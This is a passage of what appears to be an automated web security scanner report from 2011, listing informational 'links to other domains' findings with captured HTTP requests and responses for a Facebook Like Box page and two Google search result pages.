http://profile.ak.fbcdn.net/hprofile-ak-snc4/173824_1041815832_3415506_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195247_1058832109_3316701_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203072_573191063_6018929_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211621_429086_922537_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/261017_1007030379_7874447_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/274204_100002593096634_2575979_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/274872_100001817062958_3149289_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/275850_100000171544387_5458528_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/276279_100002512248508_1769368_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41799_9665781619_7931798_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/49148_100001803139553_8207430_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/L8yUExs-fkD.js
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/hzcsbK-GAuH.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/AI7cvamOOjQ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/mfm5LaL5Ify.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/vgIBfPxn_gJ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.35.50
X-Cnection: close
Date: Thu, 21 Jul 2011 17:39:58 GMT
Content-Length: 12459

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/vgIBfPxn_gJ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/AI7cvamOOjQ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/hzcsbK-GAuH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/mfm5LaL5Ify.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/L8yUExs-fkD.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/newyorkobserver" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41799_9665781619_7931798_q.jpg" alt="The New York Observer" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/adelbhtnbio" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276279_100002512248508_1769368_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002593096634" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274204_100002593096634_2575979_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/natalia.johnsen" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/261017_1007030379_7874447_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001817062958" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274872_100001817062958_3149289_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001803139553" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49148_100001803139553_8207430_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1041815832" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173824_1041815832_3415506_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211621_429086_922537_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1058832109" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195247_1058832109_3316701_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/mscamillebecerra" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203072_573191063_6018929_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275850_100000171544387_5458528_q.jpg" alt="" /><div class="name">
...[SNIP]...

18.166. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/276877_100484820802_650394_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/JSqaF4G1Vob.css
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js

Request

GET /plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

18.167. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Microsoft+Research

The response contains the following links to other domains:

http://en.wikipedia.org/wiki/Microsoft
http://en.wikipedia.org/wiki/Microsoft_Research
http://labs.live.com/
http://research.microsoft.com/
http://research.microsoft.com/apps/dp/vi/videos.aspx
http://research.microsoft.com/en-us/about/
http://research.microsoft.com/en-us/collaboration/
http://research.microsoft.com/en-us/collaboration/tools/downloads.aspx
http://research.microsoft.com/en-us/jobs/
http://research.microsoft.com/en-us/labs/cambridge/default.aspx
http://research.microsoft.com/en-us/labs/india/
http://research.microsoft.com/en-us/labs/newengland/default.aspx
http://research.microsoft.com/en-us/labs/redmond/default.aspx
http://research.microsoft.com/en-us/press/default.aspx
http://research.microsoft.com/en-us/research/default.aspx
http://research.microsoft.com/en-us/um/redmond/about/timeline/
http://research.microsoft.com/en-us/um/redmond/groups/ivm/ice.html
http://research.microsoft.com/en-us/um/redmond/projects/kinectsdk/
http://research.yahoo.com/
http://webcache.googleusercontent.com/search?q=cache:BTL5W4euuHYJ:research.microsoft.com/en-us/jobs/+Microsoft+Research&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Br7B-dAXIqEJ:research.microsoft.com/en-us/labs/newengland/default.aspx+Microsoft+Research&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:FN2xOBb-RwQJ:en.wikipedia.org/wiki/Microsoft_Research+Microsoft+Research&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:FvfjqJIJ7kYJ:research.microsoft.com/+Microsoft+Research&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:PoZ9yhmAbYMJ:research.microsoft.com/en-us/labs/cambridge/default.aspx+Microsoft+Research&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Qg3O1wCDwa8J:research.microsoft.com/en-us/labs/redmond/default.aspx+Microsoft+Research&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:TV6vSLEvD6QJ:www.readwriteweb.com/cloud/2011/07/mapreduce-for-microsoft-azure.php+Microsoft+Research&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:gkSJgZZcB4EJ:research.microsoft.com/en-us/labs/india/+Microsoft+Research&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:uKjgNg6RysYJ:research.microsoft.com/en-us/research/default.aspx+Microsoft+Research&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:ylMMspOLTR4J:www.worldwidetelescope.org/+Microsoft+Research&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com
http://www.readwriteweb.com/cloud/2011/07/mapreduce-for-microsoft-azure.php
http://www.research.ibm.com/
http://www.worldwidetelescope.org/
http://www.youtube.com/results?q=Microsoft+Research&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Microsoft+Research HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=W8r0AKxd5wk5CX1jyfDbNGqu0gNP9tvrFwquFIFVcdigP0YfOxWLbqIT-uh0HQif4kRtxM0Zmnl6hxXO7elxBhi5M5Shuv0bLm6MSaba7TZWWydFwvwYYpn2fEzjfe3s

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 01:55:23 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 102156

<!doctype html> <head> <title>Microsoft Research - Google Search</title> <script>window.google={kEI:"CyoqTtz7JOWr0AGppfHSCg",kEXPI:"17259,23756,24692,24878,24879,27400,28505,28936,29702,29859,3
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=Microsoft+Research&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://research.microsoft.com/" class=l onmousedown="return rwt(this,'','','','1','AFQjCNEuMOmMwPgltZgdL1Utu0CIJ2srkg','','0CCcQFjAA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:FvfjqJIJ7kYJ:research.microsoft.com/+Microsoft+Research&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCNFiNC8LL-rdSaddvw2T9v-sCclvyQ','','0CCwQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://research.microsoft.com/en-us/um/redmond/groups/ivm/ice.html" onmousedown="return rwt(this,'','','','1','AFQjCNFLyx2sObz4_KUNbkHv9xYlUA9Gqg','','0CC4QqwMoADAA')">Image Composite Editor</a>
...[SNIP]...
<div class=sld><a class=sla href="http://research.microsoft.com/en-us/research/default.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNF98LvRnThKZj7N7uNxOZ2f89P7iQ','','0CC8QqwMoATAA')">Our Research</a>
...[SNIP]...
<div class=sld><a class=sla href="http://research.microsoft.com/apps/dp/vi/videos.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNGBzEtJVPvjwYOn95UzuNvnj0wn7A','','0CDAQqwMoAjAA')">Videos</a></div><div class=sld><a class=sla href="http://research.microsoft.com/en-us/about/" onmousedown="return rwt(this,'','','','1','AFQjCNEOBOmoCN9Twabb6VDkh2tKlDCmDQ','','0CDEQqwMoAzAA')">About Microsoft Research</a>
...[SNIP]...
<div class=sld><a class=sla href="http://research.microsoft.com/en-us/um/redmond/projects/kinectsdk/" onmousedown="return rwt(this,'','','','1','AFQjCNGzBBOLYf7gVzZbNnck2OQEvEySTg','','0CDIQqwMoBDAA')">Kinect for Windows SDK</a>
...[SNIP]...
<div class=sld><a class=sla href="http://research.microsoft.com/en-us/collaboration/tools/downloads.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNEARPrJVX5AQKNqk9GCKhbxHpbwqg','','0CDMQqwMoBTAA')">Tools for Computer and Research ...</a>
...[SNIP]...
<div class=sld><a class=sla href="http://research.microsoft.com/en-us/press/default.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNHIiJDqwEtoBmo9BAQvDSabA_pQDQ','','0CDQQqwMoBjAA')">Media Resources</a>
...[SNIP]...
<div class=sld><a class=sla href="http://research.microsoft.com/en-us/collaboration/" onmousedown="return rwt(this,'','','','1','AFQjCNGsGekQtSKi1JfDraMqncfQLseGjQ','','0CDUQqwMoBzAA')">Microsoft Research Connections</a>
...[SNIP]...
<h3 class="r"><a href="http://research.microsoft.com/en-us/jobs/" class=l onmousedown="return rwt(this,'','','','2','AFQjCNHoUKEcQl668yjoSXQaKO4aJ0pfxQ','','0CDgQFjAB')">Careers - <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:BTL5W4euuHYJ:research.microsoft.com/en-us/jobs/+Microsoft+Research&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCNGWjcIQf_3HlLDNr79tm3muFjwBKg','','0CD0QIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://research.microsoft.com/en-us/labs/cambridge/default.aspx" class=l onmousedown="return rwt(this,'','','','3','AFQjCNF-UB-s8qE-4711GHWggly6T3AYAg','','0CD4QFjAC')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:PoZ9yhmAbYMJ:research.microsoft.com/en-us/labs/cambridge/default.aspx+Microsoft+Research&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','3','AFQjCNHaPI0i3J8eZyxgfhHfeE1KfV19HQ','','0CEMQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://research.microsoft.com/en-us/research/default.aspx" class=l onmousedown="return rwt(this,'','','','4','AFQjCNF98LvRnThKZj7N7uNxOZ2f89P7iQ','','0CEUQFjAD')">Our Research - <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:uKjgNg6RysYJ:research.microsoft.com/en-us/research/default.aspx+Microsoft+Research&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','4','AFQjCNHU1DZJ_43mKcNMlnM-aWmkPCuT8A','','0CEoQIDAD')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://research.microsoft.com/" onmousedown="return rwt(this,'','','','4','AFQjCNEuMOmMwPgltZgdL1Utu0CIJ2srkg','','0CEwQ0gIoADAD')">Microsoft Research - Turning Ideas ...</a> - <a href="http://research.microsoft.com/en-us/collaboration/" onmousedown="return rwt(this,'','','','4','AFQjCNGsGekQtSKi1JfDraMqncfQLseGjQ','','0CE0Q0gIoATAD')">Microsoft Research Connections</a> - <a href="http://research.microsoft.com/en-us/um/redmond/about/timeline/" onmousedown="return rwt(this,'','','','4','AFQjCNE0U-v-KJc6lcEQ_FAEFfBqpdVRmw','','0CE4Q0gIoAjAD')">Timeline</a>
...[SNIP]...
<h3 class="r"><a href="http://research.microsoft.com/en-us/labs/newengland/default.aspx" class=l onmousedown="return rwt(this,'','','','5','AFQjCNHr4oMfXmPW8zNctpIXWJgUBX_82g','','0CFAQFjAE')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:Br7B-dAXIqEJ:research.microsoft.com/en-us/labs/newengland/default.aspx+Microsoft+Research&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','5','AFQjCNEWEFHb7cr8Vvqn1EsPvA4lIsI_xw','','0CFUQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://research.microsoft.com/en-us/labs/redmond/default.aspx" class=l onmousedown="return rwt(this,'','','','6','AFQjCNHWlxLQtF2ihh3sFJoL7449LbaAig','','0CFcQFjAF')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:Qg3O1wCDwa8J:research.microsoft.com/en-us/labs/redmond/default.aspx+Microsoft+Research&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','6','AFQjCNGzhuDHzNPE-oE928JuoTW1CtWk5Q','','0CFwQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://research.microsoft.com/en-us/labs/india/" class=l onmousedown="return rwt(this,'','','','7','AFQjCNETY6TgYoqP9qHP5Gxf3cBgTSJj5Q','','0CF4QFjAG')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:gkSJgZZcB4EJ:research.microsoft.com/en-us/labs/india/+Microsoft+Research&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNE1QJjQUKCZD10JXyoOiQMDAHFoaw','','0CGMQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Microsoft_Research" class=l onmousedown="return rwt(this,'','','','8','AFQjCNENU_XMgLGyK9yGBTeO3en0_tD_2w','','0CGQQFjAH')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:FN2xOBb-RwQJ:en.wikipedia.org/wiki/Microsoft_Research+Microsoft+Research&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','8','AFQjCNGglQqFCqwYNsiczkbc87s4I342YA','','0CGkQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.worldwidetelescope.org/" class=l onmousedown="return rwt(this,'','','','9','AFQjCNGBzmTyIDNhnPeQ5e2ZC8HLvldNvw','','0CGsQFjAI')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:ylMMspOLTR4J:www.worldwidetelescope.org/+Microsoft+Research&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','9','AFQjCNE5EKv3EP4AWTzTYl9U1njiM6tgrA','','0CHAQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.readwriteweb.com/cloud/2011/07/mapreduce-for-microsoft-azure.php" class=l onmousedown="return rwt(this,'','','','10','AFQjCNFo9X0LFcczzSBuTn_jI2pK3CeHmg','','0CHIQFjAJ')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:TV6vSLEvD6QJ:www.readwriteweb.com/cloud/2011/07/mapreduce-for-microsoft-azure.php+Microsoft+Research&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNGcFCGz3Ryb8JdtwjNSxcwg5_mckQ','','0CHcQIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://www.research.ibm.com/" class=l onmousedown="return rwt(this,'','','','11','AFQjCNHg4bGzMGKXfPRolM_jS8HMUIaxrw','','0CHkQoggwCg')">IBM Research</a>
...[SNIP]...
<div><a href="http://research.yahoo.com/" class=l onmousedown="return rwt(this,'','','','12','AFQjCNFSZx9PZY7_CZBaLAgsYK5thUfSfw','','0CHsQoggwCw')">Research</a>
...[SNIP]...
<div><a href="http://labs.live.com/" class=l onmousedown="return rwt(this,'','','','13','AFQjCNFV6MyBEofX1bZkEDON_ljLd8neNQ','','0CH0QoggwDA')">Microsoft Live Labs</a>
...[SNIP]...
<div><a href="http://en.wikipedia.org/wiki/Microsoft" class=l onmousedown="return rwt(this,'','','','14','AFQjCNGroMeIcJT08UG6QaihLweVyAzmhA','','0CH8QoggwDQ')">Microsoft</a>
...[SNIP]...

18.168. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=New+York+Observer

The response contains the following links to other domains:

http://en.wikipedia.org/wiki/The_New_York_Observer
http://ma.tt/2011/06/new-york-observer/
http://mediamatters.org/blog/201107200012
http://nymag.com/
http://observer.com/
http://observer.guardian.co.uk/
http://topics.nytimes.com/topics/reference/timestopics/organizations/n/new_york_observer/index.html
http://webcache.googleusercontent.com/search?q=cache:92SHVesqVNQJ:en.wikipedia.org/wiki/The_New_York_Observer+New+York+Observer&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:9GlhbxE6REQJ:observer.com/+New+York+Observer&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:9KS5nnSr20sJ:ma.tt/2011/06/new-york-observer/+New+York+Observer&cd=13&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:CvVQstfzBVcJ:www.observer.com/channel/media/+New+York+Observer&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:IcGUCkkbuE8J:www.politickerny.com/2011/06/27/gillibrand-hopes-for-some-momentum-from-marriage-bill/+New+York+Observer&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:L2Tq_kCKRlEJ:wordpress.org/showcase/the-new-york-observer/+New+York+Observer&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:LMRAWPGdIP4J:www.amazon.com/The-New-York-Observer/dp/B00005NIP2+New+York+Observer&cd=12&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:PXOFi8FwAjQJ:www.observer.com/channel/real-estate/+New+York+Observer&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:nAsVBGlwGJQJ:mediamatters.org/blog/201107200012+New+York+Observer&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:v4CqNjEvVTcJ:topics.nytimes.com/topics/reference/timestopics/organizations/n/new_york_observer/index.html+New+York+Observer&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com
http://wordpress.org/showcase/the-new-york-observer/
http://www.amazon.com/The-New-York-Observer/dp/B00005NIP2
http://www.newyorker.com/
http://www.observer.com/about-us
http://www.observer.com/advertising
http://www.observer.com/channel/culture/
http://www.observer.com/channel/daily-transom/
http://www.observer.com/channel/media/
http://www.observer.com/channel/politics/
http://www.observer.com/channel/real-estate/
http://www.observer.com/subscribe
http://www.politickerny.com/2011/06/27/gillibrand-hopes-for-some-momentum-from-marriage-bill/
http://www.theatlanticwire.com/entertainment/2011/07/Cathie-blacks-alleged/40242/
http://www.villagevoice.com/
http://www.youtube.com/results?q=New+York+Observer&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?sourceid=chrome&ie=UTF-8&q=New+York+Observer HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=5f095d1913dfb266:U=94b487df0bd866af:FF=0:TM=1311179451:LM=1311259550:S=OkO5G-xMVZh3wrlr; NID=49=Mc75k8GaC4sODRf5gDiSshg7ZVBiCfL_peK--7yvryZzGeVuBMVM4SaPcjtGgf68flt1aAl6V7nItJhqlhvA7fFgIz41ztbNbR_3j6OjdY1RUGqfLgMHQ7CDj7_I7grK

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 17:39:32 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 84541

<!doctype html><head><title>New York Observer - Google Search</title><script>window.google={kEI:"VGQoToXMB4230AHVosXfCg",kEXPI:"17259,28290,28505,28663,28936,29775,30316,30427,30464,30727,31406,31718"
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=New+York+Observer&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://observer.com/" class=l onmousedown="return rwt(this,'','','','1','AFQjCNGNc5Yc8DL3yvp2jvvbZBWKkCD2KQ','','0CC0QFjAA')">The <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:9GlhbxE6REQJ:observer.com/+New+York+Observer&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCNEUb6b-en_wihLzSRpjDooDp4CTtg','','0CC8QIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.observer.com/channel/real-estate/" onmousedown="return rwt(this,'','','','1','AFQjCNHKQENPm4Rk6EocDQIL8jTbui8_ug','','0CDEQqwMoADAA')">Real Estate</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.observer.com/channel/culture/" onmousedown="return rwt(this,'','','','1','AFQjCNE7rgFJq9HhmGS-RTnkPn_HuSxmYg','','0CDIQqwMoATAA')">Culture</a></div><div class=sld><a class=sla href="http://www.observer.com/channel/media/" onmousedown="return rwt(this,'','','','1','AFQjCNEcgw_7YcMVZZr3Wlyc0tkzryQsJA','','0CDMQqwMoAjAA')">Media</a></div><div class=sld><a class=sla href="http://www.observer.com/channel/politics/" onmousedown="return rwt(this,'','','','1','AFQjCNGgNEF2QViy7sGXrBRDFP0d-yGAxg','','0CDQQqwMoAzAA')">Politics</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.observer.com/about-us" onmousedown="return rwt(this,'','','','1','AFQjCNGx9gKFY5xw0qALm-20FLqrP9JEZQ','','0CDUQqwMoBDAA')">About Us</a></div><div class=sld><a class=sla href="http://www.observer.com/subscribe" onmousedown="return rwt(this,'','','','1','AFQjCNEbiB0vct2ECahdHGaQ-V2ZYfr8UA','','0CDYQqwMoBTAA')">Subscriptions</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.observer.com/channel/daily-transom/" onmousedown="return rwt(this,'','','','1','AFQjCNGMa62gwcCd6RwrlCESTz3RH-NAvA','','0CDcQqwMoBjAA')">Transom</a></div><div class=sld><a class=sla href="http://www.observer.com/advertising" onmousedown="return rwt(this,'','','','1','AFQjCNFJASYR97mDHniQHIXfjjLFgwmU0Q','','0CDgQqwMoBzAA')">Advertising</a>
...[SNIP]...
